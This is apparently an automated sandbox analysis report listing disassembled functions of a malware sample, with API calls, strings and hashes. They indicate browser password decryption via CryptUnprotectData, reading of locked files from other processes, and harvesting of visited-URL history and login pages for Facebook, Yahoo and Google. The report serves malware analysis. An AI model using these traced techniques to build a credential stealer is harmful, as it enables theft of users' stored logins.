                                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                              • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                              • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                              • String ID: $/deleteregkey$/savelangfile
                                                                              • API String ID: 2744995895-28296030
                                                                              • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                              • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                              Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040B71C
                                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                                              • memset.MSVCRT ref: 0040B756
                                                                              • memset.MSVCRT ref: 0040B7F5
                                                                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                              • CopyFileW.KERNEL32(00445FAE,?,00000000), ref: 0040B82D
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 0040B838
                                                                              • memset.MSVCRT ref: 0040B851
                                                                              • memset.MSVCRT ref: 0040B8CA
                                                                              • memcmp.MSVCRT ref: 0040B9BF
                                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                              • memset.MSVCRT ref: 0040BB53
                                                                              • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                              • String ID: chp$v10
                                                                              • API String ID: 1297422669-2783969131
                                                                              • Opcode ID: 6440b8aaedc793584c46e1f7082173f882f72b17e7fe89946ab94d20f5a55b5d
                                                                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                              • Opcode Fuzzy Hash: 6440b8aaedc793584c46e1f7082173f882f72b17e7fe89946ab94d20f5a55b5d
                                                                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                              Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
                                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
                                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                              • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                              • UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                                                                              • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                              • String ID: bhv
                                                                              • API String ID: 4234240956-2689659898
                                                                              • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                              • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                              Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 560 413f4f-413f52 561 413fa5 560->561 562 413f54-413f5a call 40a804 560->562 564 413f5f-413fa4 GetProcAddress * 5 562->564 564->561
                                                                              APIs
                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                              • GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                              • API String ID: 2941347001-70141382
                                                                              • Opcode ID: 5f55386481140187343ab1ab8adea668b022a311609f89b9ad52cbba2c200a76
                                                                              • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                              • Opcode Fuzzy Hash: 5f55386481140187343ab1ab8adea668b022a311609f89b9ad52cbba2c200a76
                                                                              • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                              Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040C298
                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00414C68
                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                              • wcschr.MSVCRT ref: 0040C324
                                                                              • wcschr.MSVCRT ref: 0040C344
                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                              • String ID: visited:
                                                                              • API String ID: 2470578098-1702587658
                                                                              • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                              • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                              Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 590 40e175-40e1a1 call 40695d call 406b90 595 40e1a7-40e1e5 memset 590->595 596 40e299-40e2a8 call 4069a3 590->596 598 40e1e8-40e1fa call 406e8f 595->598 602 40e270-40e27d call 406b53 598->602 603 40e1fc-40e219 call 40dd50 * 2 598->603 602->598 608 40e283-40e286 602->608 603->602 614 40e21b-40e21d 603->614 611 40e291-40e294 call 40aa04 608->611 612 40e288-40e290 free 608->612 611->596 612->611 614->602 615 40e21f-40e235 call 40742e 614->615 615->602 618 40e237-40e242 call 40aae3 615->618 618->602 621 40e244-40e26b _snwprintf call 40a8d0 618->621 621->602
                                                                              APIs
                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                              • memset.MSVCRT ref: 0040E1BD
                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                              • free.MSVCRT ref: 0040E28B
                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                              • API String ID: 2804212203-2982631422
                                                                              • Opcode ID: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                              • Opcode Fuzzy Hash: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                              Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                              • memset.MSVCRT ref: 0040BC75
                                                                              • memset.MSVCRT ref: 0040BC8C
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                              • memcmp.MSVCRT ref: 0040BCD6
                                                                              • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                              • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                              • String ID:
                                                                              • API String ID: 115830560-3916222277
                                                                              • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                              • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                              • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                              • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                              Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 691 41837f-4183bf 692 4183c1-4183cc call 418197 691->692 693 4183dc-4183ec call 418160 691->693 698 4183d2-4183d8 692->698 699 418517-41851d 692->699 700 4183f6-41840b 693->700 701 4183ee-4183f1 693->701 698->693 702 418417-418423 700->702 703 41840d-418415 700->703 701->699 704 418427-418442 call 41739b 702->704 703->704 707 418444-41845d CreateFileW 704->707 708 41845f-418475 CreateFileA 704->708 709 418477-41847c 707->709 708->709 710 4184c2-4184c7 709->710 711 41847e-418495 GetLastError free 709->711 714 4184d5-418501 memset call 418758 710->714 715 4184c9-4184d3 710->715 712 4184b5-4184c0 call 444706 711->712 713 418497-4184b3 call 41837f 711->713 712->699 713->699 719 418506-418515 free 714->719 715->714 719->699
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                              • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                                              • free.MSVCRT ref: 0041848B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile$ErrorLastfree
                                                                              • String ID: |A
                                                                              • API String ID: 77810686-1717621600
                                                                              • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                              • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                              Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 722 40d134-40d13b 723 40d142-40d14e 722->723 724 40d13d call 40d092 722->724 725 40d160 723->725 726 40d150-40d159 723->726 724->723 730 40d162-40d164 725->730 728 40d15b-40d15e 726->728 729 40d18d-40d19f 726->729 728->725 728->726 729->730 731 40d295 730->731 732 40d16a-40d170 730->732 735 40d297-40d299 731->735 733 40d1a1-40d1a9 732->733 734 40d172-40d18b GetModuleHandleW 732->734 737 40d1f8-40d206 call 40d29a 733->737 738 40d1ab-40d1cb wcscpy call 40d626 733->738 736 40d20b-40d214 LoadStringW 734->736 739 40d216 736->739 737->736 746 40d1cd-40d1dd wcslen 738->746 747 40d1df-40d1f6 GetModuleHandleW 738->747 742 40d218-40d227 739->742 743 40d28e-40d293 739->743 742->743 745 40d229-40d235 742->745 743->735 745->743 748 40d237-40d28c memcpy 745->748 746->739 746->747 747->736 748->731 748->743
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                              • wcscpy.MSVCRT ref: 0040D1B5
                                                                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                              • wcslen.MSVCRT ref: 0040D1D3
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                              • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                              • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                              • String ID: strings
                                                                              • API String ID: 3166385802-3030018805
                                                                              • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                              • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                              • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                              • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                              Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                              • String ID: r!A
                                                                              • API String ID: 2791114272-628097481
                                                                              • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                              • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                              Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                              • _wcslwr.MSVCRT ref: 0040C817
                                                                                • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                              • wcslen.MSVCRT ref: 0040C82C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                              • API String ID: 2936932814-4196376884
